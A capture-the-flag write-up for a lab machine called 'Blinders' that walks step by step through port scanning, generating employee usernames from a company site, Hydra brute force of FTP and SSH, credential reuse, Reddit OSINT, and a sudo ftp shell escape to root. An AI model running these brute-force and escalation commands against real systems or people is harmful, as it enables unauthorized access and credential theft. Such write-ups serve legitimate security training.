CTF WRITEUP CUSTOM MACHINE BLACK BOX

Blinders — Black Box Pentest Writeup

person

Written By

Thomas_Shelby

Difficulty

Author

Thomas_Shelby

Target IP

192.168.1.9

Blinders is a Medium-difficulty black-box CTF machine. Starting with zero prior knowledge of the target, the attack chain involves OSINT-based username enumeration against a company website, FTP credential brute force, password reuse across SSH, social media OSINT via Reddit, and a MySQL credential chain leading to a sudo GTFObins FTP escape for root.

01_Reconnaissance

Initial port scan reveals three key services: FTP (21), an HTTP server on a non-standard port (445), and a custom SSH port (2123).

terminal / nmap 
$ sudo nmap -p21,445,2123 192.168.1.9 -sV

PORT     STATE SERVICE  VERSION
21/tcp   open  ftp
445/tcp  open  http     (Company website)
2123/tcp open  ssh      OpenSSH

Navigating to the website on port 445 reveals the Blinders PVT LTD company site. The Follow Us section contains a GitHub link. Right-clicking → Open Link in New Tab takes us to the company GitHub.

Jenkins admin panel after login

Figure 1.0 — Blinders PVT LTD company website

The GitHub page leads to the company site at blinders-pvt-ltd.github.io. Navigating to the Our Team section reveals all employee full names — critical intelligence for username generation.

terminal / username-anarchy 
# Clone username generation tool
$ git clone https://github.com/urbanadventurer/username-anarchy
$ cd username-anarchy

# Generate usernames from team names collected from the website
$ ./username-anarchy --input-file blinder.txt > blinderusername.txt

02_FTP_Brute_Force

Using the generated username wordlist against the FTP service with Hydra and a common password list yields valid credentials.

terminal / hydra FTP 
$ hydra -L blinderusername.txt -P /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt ftp://192.168.1.9

[21][ftp] host: 192.168.1.9   login: scottg   password: [REDACTED]

Logging in as scottg and downloading Welcome.pdf reveals another password credential embedded in the document.

terminal / FTP session 
$ ftp 192.168.1.9
Name: scottg
Password: [REDACTED]

ftp> ls
ftp> get Welcome.pdf

# Welcome.pdf contains a new password credential

03_SSH_Initial_Access

The password found in the PDF is tested against the custom SSH port (2123) using the same username wordlist via Hydra. The credential is being reused by another employee.

terminal / hydra SSH 
$ hydra -L blinderusername.txt -p '[REDACTED]' ssh://192.168.1.9 -s 2123

[2123][ssh] host: 192.168.1.9   login: sophiale   password: [REDACTED]

$ ssh sophiale@192.168.1.9 -p 2123

sophiale@blinders:~$ cat Teammate.txt
Aiden Hall: aidenhall1987

04_OSINT_Reddit_Enumeration

The Teammate.txt file hints at the username aidenhall1987. Running Sherlock on this username reveals an active Reddit account — and a hint in the Reddit bio mentioning work at Blinders PVT LTD, along with a Reddit link embedded on the company website.

OSINT Finding

The company website contained a Reddit link for the employee. Sherlock confirmed the username, and the Reddit bio disclosed employer affiliation — a common OSINT vector in real engagements where employees over-share on social media.

terminal / sherlock + ssh 
# Username OSINT
$ sherlock aidenhall1987
[+] Reddit: Found username — bio mentions Blinders PVT LTD

# SSH login as aidenhall1987
$ ssh aidenhall1987@192.168.1.9 -p 2123
Password: [REDACTED]

aidenhall1987@blinders:~$ cat .bash_history
mysql -u lwhite -p[REDACTED]

05_PrivEsc_via_Sudo_FTP

The bash history reveals MySQL credentials for user lwhite. The credential is reused for the system user, and sudo -l reveals lwhite can run ftp as root — a classic GTFObins escalation.

terminal / privesc 
# Switch to lwhite using credential from bash history
$ su lwhite
Password: [REDACTED]

lwhite@blinders:~$ sudo -l
(ALL) /usr/bin/ftp

# GTFObins FTP shell escape
lwhite@blinders:~$ sudo ftp
ftp> !/bin/sh

# whoami → root

# cat /root/flag.txt

Technique Note — GTFObins

When sudo ftp is available, the ! command within FTP launches a shell as the invoking user (root). This is documented on GTFObins/ftp. Always check sudo permissions after gaining any new user context.

06_Attack_Chain_Summary

  1. 01 Nmap scan → ports 21 (FTP), 445 (HTTP), 2123 (SSH)
  2. 02 Website OSINT → GitHub → Team page → employee full names
  3. 03 Username-anarchy → username wordlist generation
  4. 04 Hydra FTP brute force → scottg:[REDACTED]
  5. 05 FTP → Welcome.pdf → new credential found
  6. 06 Hydra SSH (port 2123) → sophiale with PDF password (credential reuse)
  7. 07 Teammate.txt → aidenhall1987 → Sherlock → Reddit OSINT
  8. 08 SSH as aidenhall1987 → .bash_history → MySQL credentials for lwhite
  9. 09 su lwhite → sudo -l → sudo ftp → !/bin/sh → ROOT